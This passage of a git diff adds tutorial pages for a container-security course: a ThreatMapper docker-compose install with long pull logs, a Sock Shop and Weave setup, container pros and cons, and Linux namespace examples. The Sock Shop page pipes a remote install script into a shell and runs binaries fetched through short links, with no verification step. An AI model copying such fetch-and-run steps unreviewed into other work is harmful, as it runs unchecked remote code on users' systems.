focal/stable amd64 Packages + 5:20.10.6~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.5~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.4~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.3~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.2~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.1~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.0~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:19.03.15~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:19.03.14~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:19.03.13~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:19.03.12~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:19.03.11~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:19.03.10~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:19.03.9~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages +Reading package lists... Done +Building dependency tree... Done +Reading state information... Done +``` + +# verify whether docker is installed or not + +```rust +docker + +Usage: docker [OPTIONS] COMMAND + +A self-sufficient runtime for containers + +Options: + --config string Location of client config files (default "/home/ubuntu/.docker") + -c, --context string Name of the context to use to connect to the daemon (overrides DOCKER_HOST env var and default context set + with "docker context use") + -D, --debug Enable debug mode + -H, --host list Daemon socket(s) to connect to + -l, --log-level string Set the logging level ("debug"|"info"|"warn"|"error"|"fatal") (default "info") + --tls Use TLS; implied by --tlsverify + --tlscacert string Trust certs signed only by this CA (default "/home/ubuntu/.docker/ca.pem") + --tlscert string Path to TLS certificate file (default "/home/ubuntu/.docker/cert.pem") + --tlskey string Path to TLS key file (default "/home/ubuntu/.docker/key.pem") + --tlsverify Use TLS and verify the remote + -v, --version Print version information and quit + +Management Commands: + app* Docker App (Docker Inc., v0.9.1-beta3) + builder Manage builds + buildx* Docker Buildx (Docker Inc., v0.9.1-docker) + config Manage Docker configs + container Manage containers + context Manage contexts + image Manage images + manifest Manage Docker image manifests and manifest lists + network Manage networks + node Manage Swarm nodes + plugin Manage plugins + scan* Docker Scan (Docker Inc., v0.21.0) + secret Manage Docker secrets + service Manage services + stack Manage Docker stacks + swarm Manage Swarm + system Manage Docker + trust Manage trust on Docker images + volume Manage volumes + +Commands: + attach Attach local standard input, output, and error streams to a running container + build Build an image from a Dockerfile + commit Create a new image from a container's changes + cp Copy files/folders between a container and the local filesystem + create Create a new container + diff Inspect changes to files or directories on a container's filesystem + events Get real time events from the server + exec Run a command in a running container + export Export a container's filesystem as a tar archive + history Show the history of an image + images List images + import Import the contents from a tarball to create a filesystem image + info Display system-wide information + inspect Return low-level information on Docker objects + kill Kill one or more running containers + load Load an image from a tar archive or STDIN + login Log in to a Docker registry + logout Log out from a Docker registry + logs Fetch the logs of a container + pause Pause all processes within one or more containers + port List port mappings or a specific mapping for the container + ps List containers + pull Pull an image or a repository from a registry + push Push an image or a repository to a registry + rename Rename a container + restart Restart one or more containers + rm Remove one or more containers + rmi Remove one or more images + run Run a command in a new container + save Save one or more images to a tar archive (streamed to STDOUT by default) + search Search the Docker Hub for images + start Start one or more stopped containers + stats Display a live stream of container(s) resource usage statistics + stop Stop one or more running containers + tag Create a tag TARGET_IMAGE that refers to SOURCE_IMAGE + top Display the running processes of a container + unpause Unpause all processes within one or more containers + update Update configuration of one or more containers + version Show the Docker version information + wait Block until one or more containers stop, then print their exit codes + +Run 'docker COMMAND --help' for more information on a command. +``` + +# install docker-compose + +```rust +sudo sysctl -w vm.max_map_count=262144 +sudo curl -L https://github.com/docker/compose/releases/latest/download/docker-compose-linux-x86_64 -o /usr/local/bin/docker-compose +sudo mv /usr/local/bin/docker-compose /usr/bin/docker-compose +sudo chmod +x /usr/bin/docker-compose +docker-compose --version +vm.max_map_count = 262144 +``` + +# docker-compose up + +```rust + sudo docker-compose -f docker-compose.yml up --detach +``` + +# pulling all docker images required for the management console + +```rust +[+] Running 132/133al-router Pulled 5.1s + β § deepfence-ui Pulling 55.8s + β Ώ ee30d1e46960 Pull complete 18.1s + β Ώ cbdf55152882 Pull complete 20.7s + β Ώ 02145a3d08dc Pull complete 24.4s + β Ώ 3b43024e0402 Pull complete 25.5s + β Ώ 000a421a9381 Pull complete 25.8s + β Ώ 273e2d14a316 Pull complete 26.1s + β Ώ 35f2174af386 Pull complete 52.7s + β Ώ 3bf6d37d02af Pull complete 53.2s + β Ώ 2ebf2edf21e9 Pull complete 53.7s + β Ώ 70ecf58c4679 Pull complete 54.1s + β Ώ deepfence-package-scanner Pulled 8.8s + β Ώ 51dd59142225 Pull complete 4.0s + β Ώ afd427f95343 Pull complete 5.2s + β Ώ ad4b784c8601 Pull complete 7.5s + β Ώ deepfence-backend Pulled 48.2s + β Ώ deepfence-console-agent Pulled 46.4s + β Ώ e0c9ebf1f052 Pull complete 25.5s + β Ώ 9341ad80650d Pull complete 26.0s + β Ώ b6a94e577185 Pull complete 26.9s + β Ώ f2f4f6c497c7 Pull complete 27.4s + β Ώ 83dc6dff4d1f Pull complete 27.8s + β Ώ 2c66b377cc17 Pull complete 28.1s + β Ώ ae95bb3e76fc Pull complete 29.9s + β Ώ 58edf371ef84 Pull complete 30.5s + β Ώ b5b91601778a Pull complete 30.9s + β Ώ e7ca0b813b35 Pull complete 31.4s + β Ώ bac5f99ed5ff Pull complete 32.2s + β Ώ 0b03b6c6e703 Pull complete 32.7s + β Ώ 00ef62c6beae Pull complete 33.1s + β Ώ 2317941b432c Pull complete 33.4s + β Ώ c78d4ef87429 Pull complete 33.8s + β Ώ 52d6b999791e Pull complete 37.0s + β Ώ 3c66ae264813 Pull complete 40.4s + β Ώ fa91d8140bb4 Pull complete 44.0s + β Ώ 415ec3af8b5c Pull complete 45.0s + β Ώ deepfence-diagnosis Pulled 9.3s + β Ώ d8089fb41a4e Pull complete 7.2s + β Ώ 761247dc597b Pull complete 7.9s + β Ώ deepfence-vulnerability-mapper Pulled 9.0s + β Ώ 9621f1afde84 Pull complete 4.8s + β Ώ d2f87f45af97 Pull complete 5.8s + β Ώ 0df38fc1dcc4 Pull complete 5.8s + β Ώ 5ce3bac9b38d Pull complete 6.0s + β Ώ b8a17e0751b8 Pull complete 7.7s + β Ώ deepfence-redis Pulled 20.4s + β Ώ 192e03523482 Pull complete 14.1s + β Ώ 7151bccd2756 Pull complete 14.9s + β Ώ e599fac432b2 Pull complete 16.0s + β Ώ 720d86c10923 Pull complete 16.5s + β Ώ 40911e48517b Pull complete 16.9s + β Ώ 115eb662e680 Pull complete 17.3s + β Ώ 31b9b283aa20 Pull complete 17.9s + β Ώ b748b52207f7 Pull complete 18.3s + β Ώ 5b0f449535b8 Pull complete 18.9s + β Ώ deepfence-api Pulled 48.3s + β Ώ 31b3f1ad4ce1 Pull complete 1.8s + β Ώ f335cc1597f2 Pull complete 2.0s + β Ώ 0375df124bb5 Pull complete 2.6s + β Ώ 90a356bcda5b Pull complete 2.7s + β Ώ c82e0170c13b Pull complete 2.9s + β Ώ 38dc58c5f029 Pull complete 3.0s + β Ώ 0189a7ca7a09 Pull complete 40.8s + β Ώ 8d069dc99fe4 Pull complete 45.2s + β Ώ 50e62824984f Pull complete 45.6s + β Ώ c12613b81b5c Pull complete 45.8s + β Ώ c8901960f9b5 Pull complete 45.9s + β Ώ a5981c5eb3db Pull complete 46.3s + β Ώ 860d4f2e0b1a Pull complete 46.8s + β Ώ 8a3f7b35b548 Pull complete 47.0s + β Ώ 37c02a7c1188 Pull complete 47.4s + β Ώ deepfence-celery Pulled 48.2s + β Ώ deepfence-postgres Pulled 28.2s + β Ώ 7902437d3a12 Pull complete 10.9s + β Ώ 709e2267bc98 Pull complete 11.5s + β Ώ 10c5a0a9c34e Pull complete 21.4s + β Ώ b46af7f38693 Pull complete 22.4s + β Ώ 65aa0c237f80 Pull complete 23.3s + β Ώ f6493ce74812 Pull complete 24.0s + β Ώ eaac3b44f9d0 Pull complete 24.5s + β Ώ 3b6db84bcdcc Pull complete 25.1s + β Ώ 120ba5542ffd Pull complete 25.5s + β Ώ 9fd0e93acee4 Pull complete 25.8s + β Ώ 257465d6d91b Pull complete 26.1s + β Ώ 568fad078a9c Pull complete 26.5s + β Ώ deepfence-init-container Pulled 14.8s + β Ώ 2ad0d7925a78 Pull complete 12.6s + β Ώ 3e00d8e06113 Pull complete 13.2s + β Ώ deepfence-es Pulled 41.1s + β Ώ 4e9f2cdf4387 Pull complete 15.3s + β Ώ 2e70516637d4 Pull complete 37.1s + β Ώ ba468cc9ce22 Pull complete 37.6s + β Ώ a2c864bf08ba Pull complete 38.1s + β Ώ 7869dc55514f Pull complete 38.8s + β Ώ 6320c0eaee7c Pull complete 39.5s +[+] Running 133/133al-router Pulled 5.1s + β Ώ deepfence-ui Pulled 55.9s + β Ώ ee30d1e46960 Pull complete 18.1s + β Ώ cbdf55152882 Pull complete 20.7s + β Ώ 02145a3d08dc Pull complete 24.4s + β Ώ 3b43024e0402 Pull complete 25.5s + β Ώ 000a421a9381 Pull complete 25.8s + β Ώ 273e2d14a316 Pull complete 26.1s + β Ώ 35f2174af386 Pull complete 52.7s + β Ώ 3bf6d37d02af Pull complete 53.2s + β Ώ 2ebf2edf21e9 Pull complete 53.7s + β Ώ 70ecf58c4679 Pull complete 54.1s + β Ώ deepfence-package-scanner Pulled 8.8s + β Ώ 51dd59142225 Pull complete 4.0s + β Ώ afd427f95343 Pull complete 5.2s + β Ώ ad4b784c8601 Pull complete 7.5s + β Ώ deepfence-backend Pulled 48.2s + β Ώ deepfence-console-agent Pulled 46.4s + β Ώ e0c9ebf1f052 Pull complete 25.5s + β Ώ 9341ad80650d Pull complete 26.0s + β Ώ b6a94e577185 Pull complete 26.9s + β Ώ f2f4f6c497c7 Pull complete 27.4s + β Ώ 83dc6dff4d1f Pull complete 27.8s + β Ώ 2c66b377cc17 Pull complete 28.1s + β Ώ ae95bb3e76fc Pull complete 29.9s + β Ώ 58edf371ef84 Pull complete 30.5s + β Ώ b5b91601778a Pull complete 30.9s + β Ώ e7ca0b813b35 Pull complete 31.4s + β Ώ bac5f99ed5ff Pull complete 32.2s + β Ώ 0b03b6c6e703 Pull complete 32.7s + β Ώ 00ef62c6beae Pull complete 33.1s + β Ώ 2317941b432c Pull complete 33.4s + β Ώ c78d4ef87429 Pull complete 33.8s + β Ώ 52d6b999791e Pull complete 37.0s + β Ώ 3c66ae264813 Pull complete 40.4s + β Ώ fa91d8140bb4 Pull complete 44.0s + β Ώ 415ec3af8b5c Pull complete 45.0s + β Ώ deepfence-diagnosis Pulled 9.3s + β Ώ d8089fb41a4e Pull complete 7.2s + β Ώ 761247dc597b Pull complete 7.9s + β Ώ deepfence-vulnerability-mapper Pulled 9.0s + β Ώ 9621f1afde84 Pull complete 4.8s + β Ώ d2f87f45af97 Pull complete 5.8s + β Ώ 0df38fc1dcc4 Pull complete 5.8s + β Ώ 5ce3bac9b38d Pull complete 6.0s + β Ώ b8a17e0751b8 Pull complete 7.7s + β Ώ deepfence-redis Pulled 20.4s + β Ώ 192e03523482 Pull complete 14.1s + β Ώ 7151bccd2756 Pull complete 14.9s + β Ώ e599fac432b2 Pull complete 16.0s + β Ώ 720d86c10923 Pull complete 16.5s + β Ώ 40911e48517b Pull complete 16.9s + β Ώ 115eb662e680 Pull complete 17.3s + β Ώ 31b9b283aa20 Pull complete 17.9s + β Ώ b748b52207f7 Pull complete 18.3s + β Ώ 5b0f449535b8 Pull complete 18.9s + β Ώ deepfence-api Pulled 48.3s + β Ώ 31b3f1ad4ce1 Pull complete 1.8s + β Ώ f335cc1597f2 Pull complete 2.0s + β Ώ 0375df124bb5 Pull complete 2.6s + β Ώ 90a356bcda5b Pull complete 2.7s + β Ώ c82e0170c13b Pull complete 2.9s + β Ώ 38dc58c5f029 Pull complete 3.0s + β Ώ 0189a7ca7a09 Pull complete 40.8s + β Ώ 8d069dc99fe4 Pull complete 45.2s + β Ώ 50e62824984f Pull complete 45.6s + β Ώ c12613b81b5c Pull complete 45.8s + β Ώ c8901960f9b5 Pull complete 45.9s + β Ώ a5981c5eb3db Pull complete 46.3s + β Ώ 860d4f2e0b1a Pull complete 46.8s + β Ώ 8a3f7b35b548 Pull complete 47.0s + β Ώ 37c02a7c1188 Pull complete 47.4s + β Ώ deepfence-celery Pulled 48.2s + β Ώ deepfence-postgres Pulled 28.2s + β Ώ 7902437d3a12 Pull complete 10.9s + β Ώ 709e2267bc98 Pull complete 11.5s + β Ώ 10c5a0a9c34e Pull complete 21.4s + β Ώ b46af7f38693 Pull complete 22.4s + β Ώ 65aa0c237f80 Pull complete 23.3s + β Ώ f6493ce74812 Pull complete 24.0s + β Ώ eaac3b44f9d0 Pull complete 24.5s + β Ώ 3b6db84bcdcc Pull complete 25.1s + β Ώ 120ba5542ffd Pull complete 25.5s + β Ώ 9fd0e93acee4 Pull complete 25.8s + β Ώ 257465d6d91b Pull complete 26.1s + β Ώ 568fad078a9c Pull complete 26.5s + β Ώ deepfence-init-container Pulled 14.8s + β Ώ 2ad0d7925a78 Pull complete 12.6s + β Ώ 3e00d8e06113 Pull complete 13.2s + β Ώ deepfence-es Pulled 41.1s + β Ώ 4e9f2cdf4387 Pull complete 15.3s + β Ώ 2e70516637d4 Pull complete 37.1s + β Ώ ba468cc9ce22 Pull complete 37.6s + β Ώ a2c864bf08ba Pull complete 38.1s + β Ώ 7869dc55514f Pull complete 38.8s + β Ώ 6320c0eaee7c Pull complete 39.5s + β Ώ deepfence-internal-router Pulled 5.1s + β Ώ deepfence-secret-scanner Pulled 43.2s + β Ώ c963e9db8328 Pull complete 34.6s + β Ώ 7f20bc208900 Pull complete 35.0s + β Ώ a11f9e68c7c1 Pull complete 36.3s + β Ώ bac7f7e29d55 Pull complete 36.5s + β Ώ a34450f81e53 Pull complete 37.2s + β Ώ 8dc83348f20e Pull complete 41.0s + β Ώ 1789eac203f6 Pull complete 41.6s + β Ώ deepfence-fetcher Pulled 44.4s + β Ώ 59bf1c3509f3 Pull complete 22.1s + β Ώ 7f019d2ddd3b Pull complete 23.2s + β Ώ d365c5dd6d5a Pull complete 23.7s + β Ώ 86b2e2904ff3 Pull complete 24.2s + β Ώ 9e8d01c5b686 Pull complete 42.5s + β Ώ deepfence-router Pulled 5.1s + β Ώ df9b9388f04a Pull complete 1.8s + β Ώ 7c1ae225ee09 Pull complete 1.9s + β Ώ d67475b58d2b Pull complete 2.5s + β Ώ 403f08e781eb Pull complete 2.6s + β Ώ 452f212a53d1 Pull complete 2.8s + β Ώ 437cebde658b Pull complete 2.8s + β Ώ 7c9ad45672b2 Pull complete 2.9s + β Ώ 7d72372a1383 Pull complete 3.1s + β Ώ d6bb5a9a1f12 Pull complete 3.2s + β Ώ 7cf149b1a854 Pull complete 3.3s + β Ώ b6e2429d9e38 Pull complete 3.3s + β Ώ 92dcd490ec00 Pull complete 3.4s + β Ώ 617b7a99eac3 Pull complete 3.5s + β Ώ 259e00ee3450 Pull complete 3.6s + β Ώ 83bec234123b Pull complete 3.7s + β Ώ 928a4d3b5efe Pull complete 3.8s + β Ώ deepfence-topology Pulled 34.0s + β Ώ a0d0a0d46f8b Pull complete 16.0s + β Ώ 127cfa2b873d Pull complete 16.6s + β Ώ 15a88de45267 Pull complete 30.3s + β Ώ 35233bb75987 Pull complete 32.0s + β Ώ 8133cfb2a953 Pull complete 32.4s +[+] Running 19/19 + β Ώ Network ubuntu_deepfence_net Created 0.3s + β Ώ Volume "ubuntu_deepfence_data" Created 0.0s + β Ώ Container deepfence-postgres Started 16.5s + β Ώ Container deepfence-secret-scanner Started 18.4s + β Ώ Container deepfence-vulnerability-mapper Started 17.3s + β Ώ Container deepfence-diagnosis Started 17.5s + β Ώ Container deepfence-package-scanner Started 17.7s + β Ώ Container deepfence-console-agent Started 16.0s + β Ώ Container deepfence-es-master Started 17.1s + β Ώ Container df-init-container Started 16.0s + β Ώ Container deepfence-topology Started 17.3s + β Ώ Container deepfence-router Started 18.4s + β Ώ Container deepfence-internal-router Started 17.5s + β Ώ Container deepfence-redis Started 2.3s + β Ώ Container deepfence-ui Started 2.8s + β Ώ Container deepfence-fetcher Started 2.4s + β Ώ Container deepfence-celery Started 3.5s + β Ώ Container deepfence-api Started 3.4s + β Ώ Container deepfence-backend Started 3.1s +``` + +## check all running docker containers + +```rust + +docker ps +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +4514ee6713ac deepfenceio/deepfence_api_ce:1.4.1 "/app/code/dockerify…" About a minute ago Up About a minute deepfence-api +1ba3ffed69da deepfenceio/deepfence_api_ce:1.4.1 "/app/code/dockerify…" About a minute ago Up About a minute deepfence-backend +8bab0ec9f33c deepfenceio/deepfence_api_ce:1.4.1 "/app/code/dockerify…" About a minute ago Up About a minute deepfence-celery +22656ac2f42e deepfenceio/deepfence_fetcher_ce:1.4.1 "/usr/bin/start_fetc…" About a minute ago Up About a minute 8006/tcp deepfence-fetcher +53e90c2fb2ee deepfenceio/deepfence_ui_ce:1.4.1 "/home/deepfence/ent…" About a minute ago Up About a minute deepfence-ui +ef95a5d836af deepfenceio/deepfence_redis_ce:1.4.1 "/usr/local/bin/star…" About a minute ago Up About a minute 6379/tcp deepfence-redis +41861a1a902d deepfenceio/deepfence_elastic_ce:1.4.1 "/usr/bin/startEs.sh…" About a minute ago Up About a minute 127.0.0.1:9200->9200/tcp, 127.0.0.1:9300->9300/tcp deepfence-es-master +d7f746d048f1 deepfenceio/deepfence_router_ce:1.4.1 "docker-entrypoint.s…" About a minute ago Up About a minute 0.0.0.0:80->80/tcp, :::80->80/tcp, 0.0.0.0:443->443/tcp, :::443->443/tcp deepfence-router +c3e6524325b1 deepfenceio/deepfence_vulnerability_mapper_ce:1.4.1 "/entrypoint.sh" About a minute ago Up About a minute 8001/tcp deepfence-vulnerability-mapper +4331c9eeb50f deepfenceio/deepfence_router_ce:1.4.1 "docker-entrypoint.s…" About a minute ago Up About a minute 127.0.0.1:8443->443/tcp deepfence-internal-router +16fae4515f45 deepfenceio/deepfence_diagnosis_ce:1.4.1 "/home/diagnosis" About a minute ago Up About a minute deepfence-diagnosis +515a139b6c8f deepfenceio/deepfence_agent_ce:1.4.1 "/usr/local/bin/star…" About a minute ago Up About a minute deepfence-console-agent +10ac5757f982 deepfenceio/deepfence_postgres_ce:1.4.1 "docker-entrypoint.s…" About a minute ago Up About a minute 5432/tcp deepfence-postgres +50621d650d96 deepfenceio/deepfence_package_scanner_ce:1.4.1 "/usr/local/bin/pack…" About a minute ago Up About a minute 8002/tcp, 8005/tcp deepfence-package-scanner +0e96086bc3d0 deepfenceio/deepfence_discovery_ce:1.4.1 "/home/deepfence/ent…" About a minute ago Up About a minute 127.0.0.1:8004->8004/tcp deepfence-topology +bda5019a336a deepfenceio/deepfence_secret_scanner_ce:1.4.1 "/home/deepfence/usr…" About a minute ago Up About a minute deepfence-secret-scanner +``` + +access threatmapper console using AWS instance public IP + +54.152.156.120 (in your case check your EC2 instance public IP ) + +![](https://cdn.hashnode.com/res/hashnode/image/upload/v1671720365441/b1c13f69-94ee-4db1-85e7-705c85adbe4a.png ) + +![](https://cdn.hashnode.com/res/hashnode/image/upload/v1671720385153/020c94de-a9bb-4d2b-a4c1-8b7101377565.png ) + +next part of this you will find here you can do the same deployment using Kubernetes or Helm \ No newline at end of file diff --git a/content/en/containersecurity/b28.Sock-shop-weave 2.md b/content/en/containersecurity/b28.Sock-shop-weave 2.md new file mode 100644 index 0000000..22cd934 --- /dev/null +++ b/content/en/containersecurity/b28.Sock-shop-weave 2.md @@ -0,0 +1,43 @@ +--- +title: "Sock Shop Docker Compose and Weave" +slug: "Sock-Shop-Docker-Compose-and-Weave" +--- + +Sock Shop Docker Compose & Weave + + +Pre-requisites +Install Docker +Install Weave Scope +Install Weave Net + +``` + +git clone https://github.com/microservices-demo/microservices-demo +cd microservices-demo +``` + + +``` +curl -sSL https://get.docker.com/ | sh +apt-get install -yq python-pip build-essential python-dev +pip install docker-compose +curl -L git.io/weave -o /usr/local/bin/weave +chmod a+x /usr/local/bin/weave +``` + +Launch Weave Scope + +``` + sudo curl -L git.io/scope -o /usr/local/bin/scope +sudo chmod a+x /usr/local/bin/scope +scope launch +``` + +Weave launch + +``` +weave launch +docker-compose -f deploy/docker-compose-weave/docker-compose.yml up -d + +``` \ No newline at end of file diff --git a/content/en/containersecurity/b3.Container-adv-dis 2.md b/content/en/containersecurity/b3.Container-adv-dis 2.md new file mode 100644 index 0000000..03ceecf --- /dev/null +++ b/content/en/containersecurity/b3.Container-adv-dis 2.md @@ -0,0 +1,75 @@ +--- +title: "Container Advantage and Disadvantages " +description: "The introduction to this course." +slug: "Container-Advantage-and-Disadvantages" +--- + +# Container Advantages + +Every day, developers find new ways to put containerization to work to solve their challenges. There is no shortage of ways to use containerization, and every application will likely produce unique benefits. Here are some of the most common reasons developers decide to containerize: + +- Portability + - No discussion of containerization is complete without at least one mention of the motto, β€œwrite once, run anywhere.” Since a container bundles all dependencies, you can take your application just about anywhere without rebuilding it to account for a new environment. + + Also, the abstraction provided by containerization ensures that your container works the same way regardless of where you deploy it. That means you can take your app to the cloud, run it on in a VM, or go directly to bare metal. As long as the host operating system supports your containerization tools, you are ready to deploy with minimal hassle. +- Efficiency + - Containerization is one of the most efficient methods of virtualization available to developers. Containers improve efficiency in two ways: they use all available resources, and they minimize overhead. + + - When properly configured, containers allow a host to take advantage of virtually all available resources. Isolated containers can perform their operations without interfering with other containers, allowing a single host to perform many functions. + + - Containers also remove the need for virtualized operating systems, hypervisors, and other bottlenecks typically introduced by virtualization techniques. Unlike VMs, which rely on their virtual kernel, containers use the host operating system’s kernel. This drastically reduces overhead and minimizes resource use. +- Agility + - Containerization is a crucial tool for streamlining DevOps workflows. You can create containers rapidly, deploy them to any environment, where they can be used to solve many diverse DevOps challenges. + + When a task presents itself, you can quickly develop a container to handle the job. If it is no longer needed, you can automatically shut it down until it is needed again. This is a technique known as orchestration. Technologies like Kubernetes automate the process of coordinating, managing, scaling, and removing containers. + + You can think of Kubernetes as the conductor of your container orchestra. With the help of Kubernetes-coordinated containers, developers can rapidly respond to problems and spin up novel solutions without worrying about lengthy and complicated deployments. + + +- Faster delivery + - How long does it take upgrades to go from concept to implementation? Generally, the bigger an application, the longer it takes to get any improvements implemented. Containerization solves this issue by compartmentalizing your application. You can divide even the most enormous beast of an application into discrete parts using microservices. + + - Microservices take apart much larger applications by segmenting pieces into containers. This division makes it much easier for developers to implement changes and deploy new code. You can change isolated areas of the application without affecting the whole. +- Improved security + - The isolation introduced by containerization also provides an additional layer of security. Because containers are isolated from one another, you can be confident that your applications are running in their own self-contained environment. That means that even if the security of one container is compromised, other containers on the same host remain secure. + + - In addition to being isolated from one another, containers are also isolated from the host operating system and can only minimally interact with computing resources. All of this equates to an inherently more secure way to deploy applications. +- Faster app startup + - Compared to other methods of virtualization such as VMs, containers are extremely lightweight. One of the many benefits of being lightweight is rapid startup times. Because a container doesn’t rely on a hypervisor or virtualized operating system to access computing resources, startup times are virtually instantaneous. + + - The only limiting factor is the application itself. With no substantial overhead to wait for, the only startup delay is from your code. Rapid startup is a great reason for frequent updates and improvements. + + +- Easier management + - Containerization allows developers the versatility to operate their code in either a virtualized or bare-metal environment. Whatever the demands of deployment, containerization can rise to meet them. Should there be a sudden need to retool your environment from metal to virtual or vice versa, your containerized applications are already prepared to make the switch. + + - Containerized apps using microservices become so flexible that you can host certain elements on bare metal and deploy others to virtual cloud environments. + + - Thinking with containers allows developers to reconceptualize their available resources. That might mean squeezing an extra drop of processing from a machine at maximum capacity. Or it could mean finding that what before seemed like a resource limitation was simply an opportunity to innovate. + + +- Flexibility + - Kubernetes offers a variety of tools that simplify container management, like rollbacks and upgrades, as part of the platform. It also handles installation. There are self-healing features you can use to attempt to recover failed containers, terminate containers that fail health checks, and constantly monitor your containers’ health and status. + + - Kubernetes also automates resource management. You can allocate each container a set amount of CPU and RAM to handle its tasks. Ultimately, managing containers with the help of a tool such as Kubernetes is leaps and bounds easier than traditional application management methods. + + +# Container Disadvantages + +- Not right for all tasks + - containers are ideally suited to microservice-type application development -- an approach that allows more complex applications to be configured from basic building blocks, where each building block is deployed in a container and the constituent containers are linked together to form the cohesive application. The application's functionality can then be scaled by deploying more containers of the appropriate building blocks rather than entire new iterations of the full application. +- Grappling with dependencies + - Common VMs are extremely self-contained and each VM includes a unique operating system (OS), drivers and application components. VMs can also be migrated to any other system as long as a suitable hypervisor is available. By comparison, containers run on top of a physical OS, sharing much of the underlying OS kernel along with many libraries and binaries. Bittman explained that placing dependencies on containers that can limit portability between servers. For example, Linux containers under Docker cannot run on current versions of Windows Server. +- Weaker isolation + - Hypervisor-based VMs provide a high level of isolation from one another because the system's hardware resources are all virtualized and presented to the VMs through the hypervisor. This means a bug, virus or intrusion could compromise one VM, but not carry over to other VMs. + + - Containers are weaker because they share an OS kernel and components and already have a deep level of authorization (usually root access in Linux environments) in order to run in the first place. As a consequence, flaws and attacks have a much greater potential to carry down into an underlying OS and over into other containers -- potentially propagating malicious activity far beyond the original event. + + - While container platforms are evolving to segregate OS rights and limit vulnerable security postures, Bittman explains that administrators can boost security now by running containers in a VM. For example, it's possible to set up a Linux VM on Hyper-V and install Docker containers on the Linux VM. Even if containers within the VM are compromised, the vulnerability will not extend outside of the VM -- limiting the scope of potential damage. +- Potential for sprawl + - Where VM lifecycle management is important for hypervisor-based environments, lifecycle management is absolutely critical for containers. Containers can be spun up and duplicated at an astonishing rate. This is an important benefit of containers, but it's also possible to consume a vast amount of computing resources without truly realizing it. That's not bad if the application's constituent containers are spun down or deleted when they're no longer needed. But the costs to scale up a containerized application, and then forgetting to scale it back later, can impose significant (and unnecessary) cloud computing costs for the enterprise. Bittman noted that cloud providers love it -- they make money renting computing power -- and the onus is on users to watch how containers are deployed. + +- Limited tools + - The kind of tools needed to monitor and manage containers are still lacking in the industry. This is not a new phenomenon. The early days of hypervisor-based virtualization were marked by a shortage of suitable tools. And just as capable VM monitoring and management tools are now readily available, new tools are starting to appear for container management. These include Google's open source Docker management tools Kubernetes, DockerUI to replace Linux command line functions with a web-based front end, Logspout to route container logs to a central location and so on. + + diff --git a/content/en/containersecurity/b4.Namespaces 2.md b/content/en/containersecurity/b4.Namespaces 2.md new file mode 100644 index 0000000..ae8dc2a --- /dev/null +++ b/content/en/containersecurity/b4.Namespaces 2.md @@ -0,0 +1,162 @@ +--- +title: "Namespaces " +description: "Linux Container Namespaces " +slug: "namespaces" +--- + +# Namespaces + + +There are several types of namespaces in containers, including: + +1. PID Namespaces: + - These namespaces isolate the process IDs of containers from the host system and from other containers. This means that each container has its own set of process IDs, which helps to prevent conflicts and ensures that containers cannot access processes belonging to other containers or the host system. + +2. Network Namespaces: + - These namespaces isolate the network interfaces and IP addresses of containers from the host system and from other containers. This allows each container to have its own virtual network interface and IP address, enabling them to communicate with each other and with the host system. +3. Mount Namespaces: + - These namespaces isolate the file systems of containers from the host system and from other containers. This allows each container to have its own file system, which is separate from the file systems of other containers and the host system. +4. User Namespaces: + - These namespaces isolate the user IDs of containers from the host system and from other containers. This allows containers to run as a different user or group than the host system, which helps to prevent privilege escalation and ensures that containers cannot access resources belonging to other containers or the host system. +5. UTS Namespaces: + - These namespaces isolate the hostname and domain name of containers from the host system and from other containers. This allows each container to have its own hostname and domain name, which can be used to identify the container within a network. + +
+ +# PID Namespaces with example + +- PID namespaces are a Linux kernel feature that allow processes to have their own unique process identifier (PID) space, separate from the global PID space. This allows for the creation of multiple, isolated process hierarchies within a single host. + +- For example, consider a scenario where you want to run multiple instances of a web server on a single host, each with its own set of processes. Without PID namespaces, you would have to manually manage the PIDs of each instance to ensure that there are no conflicts between them. + +- With PID namespaces, you can simply create a new namespace for each instance of the web server, and the processes within each namespace will have their own unique PIDs, separate from the other instances. This makes it much easier to manage and isolate the processes of each instance. + +To create a new PID namespace, you can use the "unshare" command, followed by the `-pid` flag. For example: + +```bash +$ unshare --pid bash +``` +This will create a new bash shell within a new PID namespace, and any processes that you start within this shell will have their own unique PIDs within that namespace. You can verify this by running the "ps" command and observing the PIDs of the processes. + +
+ +# Network Namespaces with example + + +Namespaces are a way for containers to share a single kernel, but have their own set of resources and processes. This allows for multiple containers to run on a single host without conflicting with each other. + +For example, if we have two containers running on a host, each with their own namespace for network resources, they will be able to use the same network interface, but will not be able to see or interact with each other's network connections. + +To demonstrate this, we can use the following commands: + +First, create a namespace for network resources using the "ip netns" command: + +```bash +# ip netns add container1 +``` +Now, create a veth pair (virtual Ethernet pair) to connect the namespace to the host: + +```bash +# ip link add veth0 type veth peer name veth1 + +``` +Assign veth1 to the namespace: + +```bash +# ip link set veth1 netns container1 + +``` +Bring up the veth pair: + +```bash +# ip link set veth0 up +# ip netns exec container1 ip link set veth1 up + +``` +Now, assign an IP address to veth0: + +```bash +# ip addr add 192.168.0.1/24 dev veth0 + +``` +And assign an IP address to veth1 in the namespace: + +```bash +# ip netns exec container1 ip addr add 192.168.0.2/24 dev veth1 + +``` +ow, we can test connectivity between the host and the namespace by pinging the IP address assigned to veth1: + +```bash 